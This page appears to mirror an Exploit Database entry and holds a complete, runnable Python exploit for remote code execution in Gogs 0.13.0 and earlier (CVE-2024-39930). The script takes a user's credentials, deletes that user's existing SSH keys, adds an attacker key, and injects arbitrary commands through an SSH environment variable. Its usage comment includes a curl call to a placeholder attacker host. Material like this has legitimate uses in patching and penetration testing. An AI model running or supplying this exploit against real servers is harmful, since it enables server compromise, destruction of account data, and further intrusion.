gogs 0.13.0 – Remote Code Execution (RCE)

• Exploit Database
• 48 阅读

• 作者： cybersploit
  日期： 2025-07-02
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/52348/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195

  # Exploit Title: gogs 0.13.0 - Remote Code Execution (RCE) # Date: 27th June, 2025 # Exploit Author: Ardayfio Samuel Nii Aryee # Software link: https://github.com/gogs/gogs.git # Version: gogs <=0.13.0 # Tested on: Ubuntu # CVE: CVE-2024-39930     # =============================== # Example Usage: # python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub "touch /tmp/pwned" # python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub "curl http://atacker.com" --ssh-port 2222 # ===============================   import requests import paramiko import base64 import random import string import sys import argparse from urllib.parse import urlparse   API_BASE_URL = ""   def generate_random_string(length=8, charset=None): if charset is None: charset = string.ascii_letters + string.digits return &apos;&apos;.join(random.choices(charset, k=length))   def make_headers(token=None, basic_auth=None): headers = {"Content-Type": "application/json"} if token: headers["Authorization"] = f"token {token}" elif basic_auth: b64 = base64.b64encode(basic_auth.encode()).decode() headers["Authorization"] = f"Basic {b64}" return headers   def http_post(path, json=None, headers=None): url = f"{API_BASE_URL}{path}" response = requests.post(url, json=json, headers=headers) response.raise_for_status() return response   def http_get(path, headers=None): url = f"{API_BASE_URL}{path}" response = requests.get(url, headers=headers) response.raise_for_status() return response   def http_delete(path, headers=None): url = f"{API_BASE_URL}{path}" response = requests.delete(url, headers=headers) response.raise_for_status() return response   def obtain_api_token(username, password): auth = f"{username}:{password}" headers = make_headers(basic_auth=auth) data = {"name": generate_random_string()}   try: response = http_post(f"/users/{username}/tokens", json=data, headers=headers) token = response.json()[&apos;sha1&apos;] print(f"[+] API Token Acquired: {token}") return token except Exception as e: print(f"[!] Failed to obtain API token: {e}") sys.exit(1)   def create_repo(token): repo_name = generate_random_string() headers = make_headers(token=token) data = { "name": repo_name, "description": "Auto-created repository", "private": False }   try: response = http_post("/user/repos", json=data, headers=headers) full_name = response.json()[&apos;full_name&apos;] print(f"[+] Repository Created: {full_name}") return full_name except Exception as e: print(f"[!] Failed to create repository: {e}") sys.exit(1)   def delete_existing_ssh_keys(token): headers = make_headers(token=token) try: response = http_get("/user/keys", headers=headers) keys = response.json() for key in keys: key_id = key[&apos;id&apos;] http_delete(f"/user/keys/{key_id}", headers=headers) print(f"[+] Deleted SSH Key ID: {key_id}") except Exception as e: print(f"[!] Failed to delete existing SSH keys: {e}") sys.exit(1)   def add_ssh_key(public_key_path, token): delete_existing_ssh_keys(token)   try: with open(public_key_path, &apos;r&apos;) as f: key = f.read() except Exception as e: print(f"[!] Failed to read public key file: {e}") sys.exit(1)   headers = make_headers(token=token) data = { "title": generate_random_string(), "key": key }   try: response = http_post("/user/keys", json=data, headers=headers) print(f"[+] SSH Key Added: {response.status_code}") except Exception as e: print(f"[!] Failed to add SSH key: {e}") sys.exit(1)   def exploit(ssh_user, ssh_host, ssh_port, private_key_path, repo_path, command): try: key = paramiko.RSAKey.from_private_key_file(private_key_path) except Exception as e: print(f"[!] Failed to load SSH key: {e}") sys.exit(1)   try: client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) client.connect(hostname=ssh_host, port=int(ssh_port), username=ssh_user, pkey=key)   session = client.get_transport().open_session()   print("[+] Executing command...... ") session.set_environment_variable("--split-string", command) session.exec_command(f"git-upload-pack {repo_path}")   stdout = session.makefile(&apos;rb&apos;, 1024) stderr = session.makefile_stderr(&apos;rb&apos;, 1024)   print("STDERR:", stderr.read().decode()) print("STDOUT:", stdout.read().decode())   session.close() client.close() except Exception as e: print(f"[!] Error: {e}") sys.exit(1)   def main(): global API_BASE_URL   parser = argparse.ArgumentParser(description="Exploit Gogs SSH argument injection (CVE-2024-39930)") parser.add_argument("url", help="Gogs application URL (e.g., http://skillforge.lab:3000)") parser.add_argument("auth", help="Gogs credentials in the format username:password") parser.add_argument("private_key", help="Path to private SSH key") parser.add_argument("public_key", help="Path to public SSH key") parser.add_argument("command", help="Command to execute remotely") parser.add_argument("--ssh-port", type=int, default=None, help="Optional: custom SSH port to use") args = parser.parse_args()   parsed_url = urlparse(args.url) API_BASE_URL = f"{parsed_url.scheme}://{parsed_url.netloc}/api/v1" ssh_host = parsed_url.hostname ssh_port = args.ssh_port if args.ssh_port else (parsed_url.port or 22)   try: username, password = args.auth.split(":") except ValueError: print("[!] Invalid format for auth argument") sys.exit(1)   token = obtain_api_token(username, password) repo_path = create_repo(token) add_ssh_key(args.public_key, token)   exploit( ssh_user=username, ssh_host=ssh_host, ssh_port=ssh_port, private_key_path=args.private_key, repo_path=repo_path, command=args.command )   if __name__ == "__main__": main()